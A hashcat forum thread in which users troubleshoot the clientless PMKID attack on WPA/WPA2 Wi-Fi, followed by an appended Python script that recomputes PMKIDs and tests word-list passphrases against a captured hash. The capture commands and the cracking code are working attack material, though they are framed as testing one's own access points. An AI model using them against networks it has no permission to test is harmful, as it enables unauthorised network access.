New attack on WPA/WPA2 using PMKID - hashcat Forum (https://hashcat.net/forum), Forum: User Contributions (https://hashcat.net/forum/forum-25.html), Thread: /thread-7717.html
RE: New attack on WPA/WPA2 using PMKID - freeroute - 10-13-2018

(10-13-2018, 01:03 PM) pineapplepride Wrote: Hi everyone,

Before monitor mode:
Code:
systemctl stop wpa_supplicant.service
Then
Code:
ip link set wlan0 down

RE: New attack on WPA/WPA2 using PMKID - pineapplepride - 10-13-2018

(10-13-2018, 01:03 PM) pineapplepride Wrote: Hi everyone,

Update: Thanks, that helped. I'm also running it with a filterlist of 1 MAC address right now, if that matters. So I got it to run, but it only says "PROBEREQUEST" and "PROBERESPONSE" (never "AUTHENTICATION" or "ASSOCIATIONREQUEST") and of course never "FOUND PMKID". Do you know what this could mean? I tried it on 3 APs so far; should I try more? Thank you again, I'm really grateful.

RE: New attack on WPA/WPA2 using PMKID - pineapplepride - 10-13-2018

I got the PMKID now. Thanks again.

RE: New attack on WPA/WPA2 using PMKID - Rit - 10-23-2018

It doesn't work, I tried it against 2 wireless routers. I did get it to work, I had the mask wrong.

RE: New attack on WPA/WPA2 using PMKID - elidell - 10-27-2018

Hey, super exciting post.. but I just tested this against three APs to which I know the password. I made a very small word list that contained those passwords, and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if I am missing something.. I wait of course until HCXDUMPTOOL yields a PMKID FOUND! running a command like so:

`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng`

(which takes a while! I'd almost rather do a de-auth / capture 4-way attack) where homewifi.txt has my router's MAC address minus the ":". I then ran:

`hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng`

Code:
summary:
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1

Anything I'm missing? Or does it just not work? Maybe I'm late to the game and it's already patched on all three routers? Doubt that.

RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018

If there is an algorithm for the handshake, and another for the PMKID, and the common denominator is the password, can't the handshake and the PMKID be used to reveal the PW?

RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018

(10-27-2018, 05:04 PM) elidell Wrote: Hey, super exciting post.. but I just tested this against three APs to which I know the password. I made a very small word list that contained those passwords, and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if I am missing something.. I wait of course until HCXDUMPTOOL yields a PMKID FOUND! running a command like so:

RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018

Looks to me that you only ran hcxpcaptool and not hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.

RE: New attack on WPA/WPA2 using PMKID - slyexe - 10-27-2018

(10-27-2018, 06:20 PM) Rit Wrote: If there is an algorithm for the handshake, and another for the PMKID, and the common denominator is the password, can't the handshake and the PMKID be used to reveal the PW?

Both are usable to be decrypted with hashcat. Whether you are obtaining a handshake via a de-auth of a client to create a hccapx attack or capturing a PMKID clientless, they both yield the same result, just in different formats.

@elidell - Rit is correct in that you have created the proper hash to be run with hashcat. Now you need to create your attack and load your hash to find the password.

RE: New attack on WPA/WPA2 using PMKID - elidell - 10-29-2018

(10-23-2018, 11:07 PM) Rit Wrote: It doesn't work, I tried it against 2 wireless routers.

(10-27-2018, 06:31 PM) Rit Wrote: Looks to me that you only ran hcxpcaptool and not hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.

LOL, no, I just didn't post the hashcat results. I assure you I put it through hashcat. I made a simple word list that had 4 passwords, including the one used by clownhouse, "Password123". Turns out though I didn't actually spell it correctly in my dummy word list.
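The two points the last posts make (a PMKID and a handshake are checked the same way, by deriving the PMK from a candidate passphrase, and a misspelled word list therefore never matches) can be verified offline against your own access point before blaming the tools. The following is an added example, not code from this thread or from the hcx tools: it recomputes the PMKID for a hashcat 16800 line (the PMKID*AP-MAC*client-MAC*ESSID-hex format that hcxpcaptool -z writes) from a candidate passphrase; the ESSID and password come from the thread, the MAC addresses and the sample line are constructed.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str):
    """Split a hashcat -m 16800 line: PMKID*AP_MAC*STA_MAC*ESSID, all hex, no colons."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex))


def make_16800(passphrase: str, essid: str, mac_ap: str, mac_sta: str) -> str:
    """Build the 16800 line an AP with this passphrase would yield (for self-checks)."""
    essid_b = essid.encode("utf-8")
    ap, sta = bytes.fromhex(mac_ap), bytes.fromhex(mac_sta)
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid_b), ap, sta)
    return "*".join(x.hex() for x in (pmkid, ap, sta, essid_b))


def find_passphrase(line: str, candidates):
    """Return the first candidate whose derived PMKID equals the captured one, else None."""
    pmkid, ap, sta, essid = parse_16800(line)
    for cand in candidates:
        derived = pmkid_from_pmk(pmk_from_passphrase(cand, essid), ap, sta)
        if hmac.compare_digest(derived, pmkid):
            return cand
    return None


# Constructed sample: ESSID and password as in the thread, MAC addresses made up.
SAMPLE_LINE = make_16800("Password123", "clownhouse", "001122334455", "66778899aabb")

if __name__ == "__main__":
    # The thread's failure mode: a word list with the password misspelled matches nothing.
    print(find_passphrase(SAMPLE_LINE, ["Passw0rd123", "password123"]))
    print(find_passphrase(SAMPLE_LINE, ["Passw0rd123", "Password123"]))
```

Feed a real line from the hcxpcaptool -z output file in place of SAMPLE_LINE to confirm that your own known password is reproduced before spending GPU time on a word list.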